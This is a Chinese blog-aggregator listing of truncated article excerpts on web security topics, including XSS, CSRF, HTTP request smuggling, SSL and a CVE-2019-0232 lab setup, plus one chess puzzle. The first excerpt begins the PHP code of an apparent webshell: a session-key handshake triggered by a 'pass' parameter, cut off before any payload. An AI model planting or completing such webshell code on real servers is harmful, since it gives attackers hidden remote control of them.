先是shell脚本 <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16); $_SESSION['k']=$key; print $key ...
分类:
其他好文 时间:
2020-06-24 14:22:32
阅读次数:
76
跨站点脚本是最常见的浏览器端漏洞之一。XSS本身是由客户端脚本语言(例如HTML和JavaScript)的Internet安全漏洞引起的威胁。在XSS中,攻击者能够操纵合法但易受攻击的Web应用程序执行恶意任务。XSS攻击可能导致身份和数据盗窃。它们甚至可能导致病毒传播,有时甚至导致对用户浏览器的远 ...
分类:
编程语言 时间:
2020-06-24 09:18:28
阅读次数:
124
网络劫持被攻击时常有发生,打开正确的网站被跳转到另一个网站真的非常不安全!那该如何是好呢?SSL证书来帮忙!安装SSL证书可以保证网站的信息从用户浏览器到服务器之间是高强度加密传输的,可以防止信息被窃取和篡改。那么怎么判断一个网站是否安装了SSL证书呢?没有安装SSL证书的网站又会是什么样的?安装S ...
分类:
Web程序 时间:
2020-06-23 15:38:25
阅读次数:
56
1、对用户信息的描述 首先用户有一些基本信息: 最简单的: 用户名称 + 用户密码 然后是用户状态,例如封号,注销,停用,等等 用户名称 + 用户密码 + 账号状态 接着为了防止脚本攻击,又产生了图形码验证,为了区分人和机器 用户名称 + 用户密码 + 用户状态 + 图形验证码 2、过程设计: 所以 ...
分类:
编程语言 时间:
2020-06-21 23:38:15
阅读次数:
67
问题: 给定8*8棋盘中,queen的坐标,和king的坐标。 king的同一行,同一列,同一对角线上的第一个queen,为可攻击king的queen 求所有可攻击king的queen的坐标数组。 Example 1: Input: queens = [[0,1],[1,0],[4,0],[0,4] ...
分类:
其他好文 时间:
2020-06-21 16:16:42
阅读次数:
51
第九章 计算机网络的安全 网络层 路由器 广域网 交换机 应用层和运输层 服务器 这三样,涉及到的网络大件和网络大设备内部相关联的网络协议(大设备还是需要软件的),讲了很多协议,ISO五层协议,每层都有配套协议,软硬件构成网络。 上面橙色的字好像写错了,发送方到接收方传递不成即主动攻击。目前骗子在综 ...
分类:
其他好文 时间:
2020-06-21 14:00:08
阅读次数:
73
记录一个cve-2019-0232的漏洞环境搭建的任务 1、相关信息 2019年4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),由于JRE将命令行参数传递给Windows的方式存在错误,会导致CGI Servlet受到远程执行代码的攻击。 ...
分类:
其他好文 时间:
2020-06-21 00:51:39
阅读次数:
77
现在,我们绝大多数人都会在网上购物买东西。但是很多人都不清楚的是,很多电商网站会存在安全漏洞。乌云就通报过,国内很多家公司的网站都存在 CSRF 漏洞。如果某个网站存在这种安全漏洞的话,那么我们在购物的过程中,就很可能会被网络黑客盗刷信用卡。是不是瞬间有点「不寒而栗」 的感觉? 首先,我们需要弄清楚 ...
分类:
Web程序 时间:
2020-06-20 17:01:29
阅读次数:
79
概述 跨站脚本攻击(Cross Site Scripting),简称XSS,是指恶意攻击者在Web页面中嵌入恶意代码,当用户浏览页面时,嵌入在Web页面中的恶意代码会被执行,从而达到攻击目的。一般情况下这些恶意代码是JavaScript代码。XSS漏洞通常是通过php的输出函数将JavaScript ...
分类:
其他好文 时间:
2020-06-20 01:25:21
阅读次数:
70
参考文章 浅析HTTP走私攻击 SeeBug-协议层的攻击——HTTP请求走私 HTTP 走私漏洞分析 简单介绍 攻击者通过构造特殊结构的请求,干扰网站服务器对请求的处理,从而实现攻击目标 前提知识 注:以下文章中的前端指的是(代理服务器、CDN等) Persistent Connection:持久 ...
分类:
Web程序 时间:
2020-06-20 00:37:21
阅读次数:
71
